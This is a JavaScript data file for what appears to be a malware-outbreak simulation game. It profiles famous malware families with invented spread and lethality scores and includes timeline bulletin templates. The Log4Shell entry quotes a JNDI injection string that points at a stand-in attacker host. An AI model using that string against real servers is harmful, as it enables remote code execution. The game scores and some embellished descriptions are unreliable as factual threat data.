// Comprehensive Threat Intelligence Database for CyberOutbreak
// Encompassing all major malware types, epidemiological spread attributes, and real-world signatures.

const MalwareDatabase = [
  {
    id: "wannacry",
    name: "WannaCry (WanaCrypt0r 2.0)",
    type: "Ransomware / Cryptoworm",
    category: "worm",
    year: 2017,
    origin: "North Korea (Lazarus Group)",
    severity: "CRITICAL",
    cve: "CVE-2017-0144 (EternalBlue)",
    vector: "SMBv1 Remote Code Execution (Port 445)",
    r0: 5.8,
    transmissionRate: 0.65,
    patchDifficulty: 0.25,
    stealth: 2,
    lethality: 9,
    mutationRate: 0.15,
    airgapHop: 0.08,
    killSwitchDomain: "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com",
    targetAffinities: { desktop: 0.95, laptop: 0.95, server: 0.9, medical: 0.85, scada: 0.3, phone: 0.05, iot: 0.15, router: 0.1 },
    realWorldImpact: "Infected 300,000+ computers across 150 countries within 24 hours. Crippled UK National Health Service (NHS), FedEx, Deutsche Bahn.",
    description: "Weaponized the NSA EternalBlue exploit to propagate autonomously across subnets without user interaction, demanding Bitcoin for AES-128 file decryption."
  },
  {
    id: "mirai",
    name: "Mirai Botnet",
    type: "IoT Botnet / DDoS Swarm",
    category: "botnet",
    year: 2016,
    origin: "Paras Jha & Josiah White",
    severity: "HIGH",
    cve: "Default Credential Exploitation",
    vector: "Telnet/SSH Brute Force (Port 23/2323)",
    r0: 8.4,
    transmissionRate: 0.82,
    patchDifficulty: 0.15,
    stealth: 4,
    lethality: 6,
    mutationRate: 0.35,
    airgapHop: 0.01,
    targetAffinities: { iot: 1.0, router: 0.95, desktop: 0.1, laptop: 0.1, server: 0.3, medical: 0.2, scada: 0.25, phone: 0.05 },
    realWorldImpact: "Enslaved 600,000+ IoT devices, launching record 1.2 Tbps DDoS attacks that brought down Dyn DNS, GitHub, Twitter, Spotify, and Netflix.",
    description: "Scans ARC, ARM, MIPS, and x86 IoT cameras, DVRs, and home routers using a 60-combo hardcoded default password dictionary to enlist nodes into a C2 swarm."
  },
  {
    id: "pegasus",
    name: "Pegasus",
    type: "Zero-Click Mobile Spyware",
    category: "spyware",
    year: 2021,
    origin: "NSO Group (Israel)",
    severity: "CRITICAL",
    cve: "CVE-2021-30860 (FORCEDENTRY / CoreGraphics)",
    vector: "Zero-Click iMessage / WhatsApp / WebKit Exploit",
    r0: 1.4,
    transmissionRate: 0.40,
    patchDifficulty: 0.85,
    stealth: 10,
    lethality: 8,
    mutationRate: 0.45,
    airgapHop: 0.02,
    targetAffinities: { phone: 1.0, laptop: 0.35, desktop: 0.1, server: 0.05, iot: 0.0, scada: 0.0, medical: 0.0, router: 0.0 },
    realWorldImpact: "Targeted 50,000+ high-profile politicians, investigative journalists, human rights defenders, and heads of state globally with zero user interaction.",
    description: "Military-grade spyware that gains root privilege on modern iOS and Android devices, exfiltrating encrypted WhatsApp/Signal messages, microphone, camera, and GPS silently."
  },
  {
    id: "stuxnet",
    name: "Stuxnet",
    type: "Nation-State Cyberweapon / Rootkit",
    category: "scada",
    year: 2010,
    origin: "US / Israel (Operation Olympic Games)",
    severity: "CRITICAL",
    cve: "CVE-2010-2568 (.LNK), 4x Zero-Days",
    vector: "USB LNK Exploit & Siemens Step7 PLC Hijack",
    r0: 2.1,
    transmissionRate: 0.30,
    patchDifficulty: 0.90,
    stealth: 9,
    lethality: 10,
    mutationRate: 0.05,
    airgapHop: 0.85,
    targetAffinities: { scada: 1.0, server: 0.7, desktop: 0.6, laptop: 0.5, medical: 0.3, phone: 0.0, iot: 0.1, router: 0.05 },
    realWorldImpact: "Physically tore apart ~1,000 IR-1 uranium centrifuges at Natanz nuclear facility by altering frequency-converter motor speeds while falsifying sensor telemetry.",
    description: "The world's first proven digital weapon capable of physical destruction. It specifically crossed physical air gaps via infected USB thumb drives."
  },
  {
    id: "notpetya",
    name: "NotPetya (ExPetr)",
    type: "Destructive Wiper disguised as Ransomware",
    category: "ransomware",
    year: 2017,
    origin: "Russia (Sandworm / GRU)",
    severity: "CRITICAL",
    cve: "CVE-2017-0144 + Mimikatz LSASS Dump",
    vector: "M.E.Doc Supply Chain Update & PsExec/WMI",
    r0: 6.4,
    transmissionRate: 0.75,
    patchDifficulty: 0.30,
    stealth: 3,
    lethality: 10,
    mutationRate: 0.10,
    airgapHop: 0.15,
    targetAffinities: { server: 1.0, desktop: 0.95, laptop: 0.95, scada: 0.4, medical: 0.8, router: 0.2, iot: 0.1, phone: 0.0 },
    realWorldImpact: "$10+ Billion worldwide damage. Devastated Maersk maritime shipping, Merck pharmaceuticals, FedEx TNT Express, and Ukrainian radiation monitoring at Chernobyl.",
    description: "Unlike true ransomware, NotPetya irreversibly scrambled the Master File Table (MFT) and Master Boot Record (MBR). Decryption was mathematically impossible."
  },
  {
    id: "lockbit3",
    name: "LockBit 3.0 (LockBit Black)",
    type: "Ransomware-as-a-Service (RaaS)",
    category: "ransomware",
    year: 2022,
    origin: "LockBit Supp Cartel",
    severity: "CRITICAL",
    cve: "CVE-2023-4966 (Citrix Bleed) & RDP",
    vector: "Double-Extortion, Exposed RDP & Phishing",
    r0: 3.5,
    transmissionRate: 0.50,
    patchDifficulty: 0.40,
    stealth: 6,
    lethality: 9,
    mutationRate: 0.50,
    airgapHop: 0.10,
    targetAffinities: { server: 0.95, desktop: 0.85, laptop: 0.85, medical: 0.8, scada: 0.3, router: 0.2, phone: 0.05, iot: 0.1 },
    realWorldImpact: "Extorted over 2,500 organizations globally totaling hundreds of millions of dollars; attacked Boeing, Royal Mail, and ICBC.",
    description: "Employs multi-threaded encryption capable of encrypting 100GB in under 4 minutes. Uses anti-debugging hooks and automated exfiltration to darknet leaksites."
  },
  {
    id: "emotet",
    name: "Emotet",
    type: "Polymorphic Banking Trojan & Dropper",
    category: "trojan",
    year: 2014,
    origin: "Mealybug / TA542",
    severity: "HIGH",
    cve: "CVE-2022-30190 (Follina) / Malicious Macros",
    vector: "Email Thread Hijacking & VBA Office Attachments",
    r0: 4.2,
    transmissionRate: 0.55,
    patchDifficulty: 0.50,
    stealth: 7,
    lethality: 7,
    mutationRate: 0.70,
    airgapHop: 0.05,
    targetAffinities: { desktop: 0.95, laptop: 0.95, server: 0.7, phone: 0.15, medical: 0.4, router: 0.05, iot: 0.0, scada: 0.05 },
    realWorldImpact: "Known as the world's most dangerous malware botnet. Served as primary initial access broker for Ryuk, Conti, and Trickbot infections.",
    description: "Polymorphic engine alters binary hashes every few hours to evade static antivirus. Dynamically harvests contact books to send replies into legitimate active email threads."
  },
  {
    id: "conficker",
    name: "Conficker (Downup / Kido)",
    type: "Self-Propagating Network Worm",
    category: "worm",
    year: 2008,
    origin: "Unknown (Eastern Europe suspected)",
    severity: "HIGH",
    cve: "CVE-2008-4250 (MS08-067 Server Service Buffer Overflow)",
    vector: "RPC Buffer Overflow & USB Autorun.inf",
    r0: 6.2,
    transmissionRate: 0.70,
    patchDifficulty: 0.35,
    stealth: 5,
    lethality: 5,
    mutationRate: 0.25,
    airgapHop: 0.45,
    targetAffinities: { desktop: 0.95, laptop: 0.95, server: 0.9, medical: 0.6, router: 0.1, scada: 0.2, iot: 0.1, phone: 0.0 },
    realWorldImpact: "Infected 9 to 15 million computers in 190+ countries, disabling security services, blocking Windows Update, and grounding French Air Force aircraft.",
    description: "Generated 50,000 randomized pseudo-domain names daily (DGA) across hundreds of top-level domains for decentralized command and control."
  },
  {
    id: "solarwinds",
    name: "SUNBURST (SolarWinds Supply Chain)",
    type: "State-Sponsored Supply Chain Backdoor",
    category: "supplychain",
    year: 2020,
    origin: "Russia (Cozy Bear / APT29 / SVR)",
    severity: "CRITICAL",
    cve: "Orion Software Build Pipeline Injection",
    vector: "Digitally Signed Malicious SolarWinds Orion DLL Updates",
    r0: 2.8,
    transmissionRate: 0.45,
    patchDifficulty: 0.80,
    stealth: 10,
    lethality: 8,
    mutationRate: 0.20,
    airgapHop: 0.05,
    targetAffinities: { server: 1.0, desktop: 0.6, laptop: 0.6, router: 0.5, scada: 0.2, medical: 0.3, iot: 0.1, phone: 0.0 },
    realWorldImpact: "Compromised US Treasury, Homeland Security, Pentagon, Microsoft, FireEye, and 18,000+ public and private enterprise networks.",
    description: "Injected a covert backdoor into SolarWinds' software build system. Slept dormant for 14 days before executing DGA DNS queries and mimicking Orion API communications."
  },
  {
    id: "iloveyou",
    name: "ILOVEYOU (Love Bug)",
    type: "Email Scripting Worm",
    category: "worm",
    year: 2000,
    origin: "Onel de Guzman (Philippines)",
    severity: "HIGH",
    cve: "VBScript File Extension Masking (.txt.vbs)",
    vector: "Social Engineering Email & Outlook Address Book",
    r0: 9.8,
    transmissionRate: 0.90,
    patchDifficulty: 0.10,
    stealth: 1,
    lethality: 6,
    mutationRate: 0.15,
    airgapHop: 0.02,
    targetAffinities: { desktop: 1.0, laptop: 1.0, server: 0.4, phone: 0.0, iot: 0.0, scada: 0.0, router: 0.0, medical: 0.2 },
    realWorldImpact: "Infected 10% of all connected computers on the planet (estimated 45 million systems in 10 days), forcing the UK Parliament and CIA to unplug mail servers.",
    description: "Sent an email with subject 'ILOVEYOU' containing 'LOVE-LETTER-FOR-YOU.TXT.vbs'. Upon opening, it overwrote JPEG/MP3 files and mailed itself to all Outlook contacts."
  },
  {
    id: "log4shell",
    name: "Log4Shell Exploitation",
    type: "Zero-Day Vulnerability Exploit / Worm Swarm",
    category: "supplychain",
    year: 2021,
    origin: "Discovered by Alibaba Cloud Security",
    severity: "CRITICAL",
    cve: "CVE-2021-44228",
    vector: "JNDI / LDAP Injection in Apache Log4j 2",
    r0: 7.9,
    transmissionRate: 0.85,
    patchDifficulty: 0.60,
    stealth: 6,
    lethality: 8,
    mutationRate: 0.60,
    airgapHop: 0.05,
    targetAffinities: { server: 1.0, iot: 0.7, router: 0.6, desktop: 0.4, laptop: 0.4, medical: 0.5, scada: 0.4, phone: 0.1 },
    realWorldImpact: "Affected hundreds of millions of servers worldwide, cloud infrastructure (AWS, Apple, Minecraft, Steam), triggering billions of exploit probes per hour.",
    description: "A single crafted string `${jndi:ldap://attacker.com/a}` logged by a server causes arbitrary remote Java code execution with root system privileges."
  },
  {
    id: "zeus",
    name: "Zeus (Zbot)",
    type: "Banking Trojan & Man-in-the-Browser",
    category: "trojan",
    year: 2007,
    origin: "Evgeniy Bogachev (Slavik)",
    severity: "HIGH",
    cve: "Drive-by downloads & Keylogging",
    vector: "Phishing emails & Drive-by browser zero-days",
    r0: 3.8,
    transmissionRate: 0.45,
    patchDifficulty: 0.45,
    stealth: 7,
    lethality: 7,
    mutationRate: 0.40,
    airgapHop: 0.04,
    targetAffinities: { desktop: 0.95, laptop: 0.95, phone: 0.3, server: 0.4, medical: 0.2, router: 0.0, iot: 0.0, scada: 0.0 },
    realWorldImpact: "Stole over $100 Million from thousands of commercial bank accounts, forming massive botnets across 196 countries.",
    description: "Injected DLL hooks into Internet Explorer and Firefox to intercept credentials and two-factor authentication tokens directly from HTML form fields."
  },
  {
    id: "morris",
    name: "Morris Worm",
    type: "The First Internet Worm",
    category: "worm",
    year: 1988,
    origin: "Robert Tappan Morris (Cornell Univ)",
    severity: "MEDIUM",
    cve: "Sendmail DEBUG, Fingerd Buffer Overflow, rsh",
    vector: "Unix BSD finger daemon buffer overflow",
    r0: 4.8,
    transmissionRate: 0.60,
    patchDifficulty: 0.10,
    stealth: 2,
    lethality: 4,
    mutationRate: 0.0,
    airgapHop: 0.0,
    targetAffinities: { server: 1.0, desktop: 0.5, laptop: 0.0, phone: 0.0, iot: 0.0, router: 0.2, scada: 0.0, medical: 0.0 },
    realWorldImpact: "Disabled roughly 10% of the entire ARPANET (6,000 academic & government computers) within 24 hours, leading to the birth of the first CERT.",
    description: "A coding flaw in its re-infection check caused it to relentlessly re-infect the same computers over and over, spawning thousands of processes until systems crashed."
  },
  {
    id: "darkside",
    name: "DarkSide Ransomware",
    type: "Corporate Critical Infrastructure Ransomware",
    category: "ransomware",
    year: 2021,
    origin: "DarkSide Group (Russia/Eastern Europe)",
    severity: "CRITICAL",
    cve: "Compromised Legacy VPN Credentials",
    vector: "Single Compromised Password without MFA",
    r0: 2.9,
    transmissionRate: 0.42,
    patchDifficulty: 0.50,
    stealth: 7,
    lethality: 9,
    mutationRate: 0.30,
    airgapHop: 0.12,
    targetAffinities: { server: 0.95, scada: 0.7, desktop: 0.8, laptop: 0.8, medical: 0.5, router: 0.3, iot: 0.1, phone: 0.0 },
    realWorldImpact: "Shut down Colonial Pipeline (supplying 45% of East Coast US gasoline, diesel, and jet fuel) for 6 days, provoking emergency federal declarations.",
    description: "Targets enterprise IT and OT networks simultaneously, stealing unencrypted data before locking systems with Salsa20 and RSA-1024 encryption."
  },
  {
    id: "xzbackdoor",
    name: "XZ Utils Backdoor",
    type: "Subversive Open-Source Supply Chain Compromise",
    category: "supplychain",
    year: 2024,
    origin: "Jia Tan (State-backed persona)",
    severity: "CRITICAL",
    cve: "CVE-2024-3094",
    vector: "Multi-year Open Source Social Engineering & Obfuscated M4 Macro",
    r0: 3.2,
    transmissionRate: 0.48,
    patchDifficulty: 0.75,
    stealth: 10,
    lethality: 9,
    mutationRate: 0.10,
    airgapHop: 0.02,
    targetAffinities: { server: 1.0, desktop: 0.7, laptop: 0.7, router: 0.4, scada: 0.2, medical: 0.2, iot: 0.2, phone: 0.0 },
    realWorldImpact: "Nearly compromised millions of public Linux SSH servers worldwide before being discovered by PostgreSQL engineer Andres Freund noticing a 500ms latency spike.",
    description: "A masterclass in covert infiltration: modified liblzma to intercept `RSA_public_decrypt` inside OpenSSH daemon `sshd`, granting attacker instant remote shell without logs."
  }
];

// Sample Daily Threat Intelligence Bulletins (for the timeline / update engine)
const DailyThreatFeedTemplates = [
  {
    day: 1,
    title: "Patient Zero Detected",
    level: "warning",
    text: "Initial anomalous packet beaconing detected across external gateway. Outbreak index initiated."
  },
  {
    day: 2,
    title: "Autonomous Lateral Spread",
    level: "danger",
    text: "Infection jumping across subnet boundaries via unpatched protocol exploits. Secondary devices compromised."
  },
  {
    day: 3,
    title: "Global CERT Issues Advisory",
    level: "critical",
    text: "Emergency CVE publication broadcast. IT departments scramble to audit exposed endpoints."
  },
  {
    day: 5,
    title: "Vendor Releases Patch Definition",
    level: "info",
    text: "Antivirus definition signatures updated. Automated patch deployment begins on managed servers."
  },
  {
    day: 7,
    title: "Variant Mutation Observed",
    level: "warning",
    text: "Threat actors deploy polymorphic wrapper with altered payload hashes. Detection rates dip temporarily."
  },
  {
    day: 10,
    title: "Network Quarantine Containment",
    level: "info",
    text: "Air-gapping and zero-trust segmentation successfully blocks lateral movement across DMZ."
  },
  {
    day: 14,
    title: "Herd Immunity Threshold Reached",
    level: "success",
    text: "Patched and immune nodes exceed 70%. R0 reproduction drops below containment threshold (R0 < 1.0)."
  }
];

window.MalwareDatabase = MalwareDatabase;
window.DailyThreatFeedTemplates = DailyThreatFeedTemplates;
